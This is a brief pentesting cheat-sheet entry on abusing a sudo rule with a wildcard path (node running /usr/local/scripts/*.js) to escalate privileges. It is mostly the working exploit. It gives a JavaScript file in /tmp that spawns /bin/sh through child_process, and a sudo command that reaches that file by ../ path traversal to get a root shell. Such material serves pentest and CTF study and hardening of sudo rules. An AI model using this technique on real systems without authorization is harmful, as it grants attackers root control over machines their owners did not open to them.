# Sudo Path Traversal Privilege Escalation

If some `sudo` command receives a file path, we might escalate to privileges using path traversal.

### Investigation <a href="#investigation" id="investigation"></a>

```
sudo -l

(ALL) /usr/bin/node /usr/local/scripts/*.js
```

If the file path uses wildcards, we may execute arbitrary files.\
In short, we can refer to files in different directories which the system owner unintended.

<br>

### Exploitation <a href="#exploitation" id="exploitation"></a>

Assume we can execute ‘node’ command as root and js file.\
Create the **“test.js”** under **/tmp**, which spawns a root shell after executing **‘node’** command.

```
// /tmp/test.js
require("child_process").spawn("/bin/sh", {stdio: [0, 1, 2]})
```

Now run **‘node’** command as root. We can pass the file using path traversal.

```
sudo /usr/bin/node /usr/local/scripts/../../../tmp/test.js
```